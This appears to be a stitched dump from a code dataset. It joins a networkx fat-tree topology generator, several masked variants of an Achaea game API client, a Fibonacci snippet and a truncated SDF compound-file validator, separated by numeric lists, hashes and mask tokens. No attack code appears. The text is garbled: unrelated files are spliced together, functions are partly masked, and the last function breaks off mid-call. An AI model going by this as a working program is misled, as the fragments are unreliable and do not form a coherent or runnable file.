# 4 layers: Core, Agg, Edge, ToR. Agg and Edge switches grouped into pods.
# group edges and aggregates into pods
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + (k/2))
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
# create dict of pod networks
pod_labels = ['pod_'+str(i) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = ('pod_'+str(pod_iter),)
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
# connect edge and aggregate switches within pod, add link attributes
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key],
(pod_agg,pod_edge),
channel_names,
edge_to_agg_channel_capacity)
# add pods (agg + edge) layer to fat-tree
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[pod_iter])
# link aggregate switches in pods to core switches, add link attributes
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network,
(core,pod_agg),
channel_names,
agg_to_core_channel_capacity)
# link edge switches in pods to racks, add link attributes
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network,
(pod_edge,rack),
channel_names,
rack_to_edge_channel_capacity)
# link servers to racks, add link attributes
racks_dict = {rack: [] for rack in racks} # track which endpoints in which rack
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network,
(rack, server),
channel_names,
server_to_rack_channel_capacity)
racks_dict[rack].append(server)
# calc total network capacity
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (num_servers * num_channels * server_to_rack_channel_capacity) / 2
# init global network attrs
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=node_labels,
topology_type='fat_tree',
racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity,
endpoint_label = 'server',
topology_type='unknown',
node_labels=['server'],
racks_dict=None):
'''Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
assume do not have rack system where have multiple servers in one
rack.
'''
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2 # all eps have a src & a dst port
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
# ensure racks dict is str so json serialisable
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
# switch racks_dict keys and values to make hashing easier
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
def gen_channel_names(num_channels):
'''Generates channel names for channels on each link in network.'''
channels = [channel+1 for channel in range(num_channels)]
channel_names = ['channel_' + str(channel) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network,
edge,
channel_names,
channel_capacity,
bidirectional_links=True):
'''Adds channels and corresponding max channel bytes to single edge in network.
Args:
network (networkx graph): Network containing edges to whiich attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
'''
if bidirectional_links:
attrs = {edge:
{'{}_to_{}_port'.format(edge[0], edge[1]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
},
'{}_to_{}_port'.format(edge[1], edge[0]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
}
}
}
else:
attrs = {edge:
{'channels': {channel: channel_capacity for channel in channel_names},
'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network,
edges,
channel_names,
channel_capacity,
bidirectional_links=True):
'''Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
'''
if bidirectional_links:
attrs = {edge:
{'{}_to_{}_port'.format(edge[0], edge[1]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
},
'{}_to_{}_port'.format(edge[1], edge[0]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
}
}
for edge in edges}
else:
attrs = {edge:
{'channels':
{channel: channel_capacity for channel in channel_names},
'max_channel_capacity':
channel_capacity
} for edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
'''Gets dict where keys are node types, values are list of nodes for each node type in graph.'''
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
# not this node type
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
'''Gets networkx positions of nodes in fat tree network for plotting.'''
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {} # dict for heigh separation between fat tree layers
widths = {} # dict for width separation between nodes within layers
h = iter([1, 2, 3, 4, 5]) # server, rack, edge, agg, core heights
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1/(len(node_type_dict[node_type])+1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = ((idx+1)*widths[node_type]*width_scale,heights[node_type]*height_scale)
idx += 1
return pos
def init_network_node_positions(net):
'''Initialises network node positions for plotting.'''
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network,
draw_node_labels=True,
ep_label='server',
network_node_size=2000,
font_size=30,
linewidths=1,
fig_scale=2,
path_to_save=None,
show_fig=False):
'''Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
font_size (int,float): Size of of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
matplotlib.figure.Figure: node distribution plotted as a 2d matrix.
'''
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15*fig_scale,15*fig_scale])
# add nodes and edges
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph['node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
# network nodes
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']) # server, rack, edge, agg, core
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network,
pos,
nodelist=network_nodes_dict[node_type],
node_size=network_node_size,
node_color=next(node_colours),
linewidths=linewidths,
label=node_type)
if draw_node_labels:
# nodes
nx.draw_networkx_labels(network,
pos,
font_size=font_size,
font_color='k',
font_family='sans-serif',
font_weight='normal',
alpha=1.0)
# fibre links
fibre_links = list(network.edges)
nx.draw_networkx_edges(network,
pos,
edgelist=fibre_links,
edge_color='k',
width=3,
label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
if __name__ == '__main__':
#network = gen_simple_network()
#network = gen_nsfnet_network()
network = gen_fat_tree(k=3)
plot_network(network, 'figures/graph/',name='network_graph.png',with_labels=True)
| [
11,
12,
13,
15,
16
] |
652 | da66b254afb3a8fcd3783a38d8624caa917e58c3 | <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
<mask token>
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
<mask token>
<mask token>
<mask token>
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
read, self.total)
| <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
<mask token>
<mask token>
<mask token>
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
<mask token>
<mask token>
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
read, self.total)
| <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.
password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,),
authed=self.auth, params=params)
if req.status_code != 200:
return None
result = req.json()
return result
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
read, self.total)
| <mask token>
def _requires_auth(func):
def wrapper(self, *args, **kwargs):
if self.auth is not True:
raise APIError()
return func(self, *args, **kwargs)
return wrapper
class API:
auth = None
CHECKAUTH_RESOURCE = '/checkauth.json'
CHARACTERS_RESOURCE = '/characters.json'
SPECIFIC_CHARACTER_RESOURCE = '/characters/{}.json'
NEWS_RESOURCE = '/news.json'
SPECIFIC_NEWS_RESOURCE = '/news/{}.json'
SPECIFIC_NEWS_POST_RESOURCE = '/news/{}/{}.json'
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.
password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,),
authed=self.auth, params=params)
if req.status_code != 200:
return None
result = req.json()
return result
def post(self, section, number):
pass
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
read, self.total)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
ACHAEA_ENDPOINT = 'https://api.achaea.com'
def _requires_auth(func):
def wrapper(self, *args, **kwargs):
if self.auth is not True:
raise APIError()
return func(self, *args, **kwargs)
return wrapper
class API:
auth = None
CHECKAUTH_RESOURCE = '/checkauth.json'
CHARACTERS_RESOURCE = '/characters.json'
SPECIFIC_CHARACTER_RESOURCE = '/characters/{}.json'
NEWS_RESOURCE = '/news.json'
SPECIFIC_NEWS_RESOURCE = '/news/{}.json'
SPECIFIC_NEWS_POST_RESOURCE = '/news/{}/{}.json'
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,), authed=self.auth,
params=params)
if req.status_code != 200:
return None
result = req.json()
return result
def post(self, section, number):
pass
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills, mob_kills,
explorer_rank, current_class, messages_total=None, messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank, player_kills, mob_kills,
explorer_rank, current_class, messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.read, self.total)
| [
12,
15,
20,
23,
26
] |
653 | 83c7bb2e109f8affd9e2a12e8c5370b0f5a34048 | <mask token>
| def fibonacci(quantidade):
resultado = [1, 2]
for _ in range(2, quantidade):
resultado.append(sum(resultado[-2:]))
return resultado
<mask token>
| def fibonacci(quantidade):
resultado = [1, 2]
for _ in range(2, quantidade):
resultado.append(sum(resultado[-2:]))
return resultado
for fib in fibonacci(20):
print(fib)
| def fibonacci(quantidade):
resultado = [1, 2]
# while True:
# substituir o while pelo for, em um range do 2° valor da lista, correr até
# o valor definido na função "Quantidade"
for _ in range(2, quantidade):
# desta forma ele irá realizar a função do 2° da lista até atingir
# o valor de quantiade.
# utiziamos o _ no for, para dizer que é uma função não utilizad
resultado.append(sum(resultado[-2:]))
return resultado
for fib in fibonacci(20):
print(fib)
| null | [
0,
1,
2,
3
] |
654 | 0082f75332321dba498f06d4c4a99c9248829b59 | <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
<mask token>
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
<mask token>
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
<mask token>
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
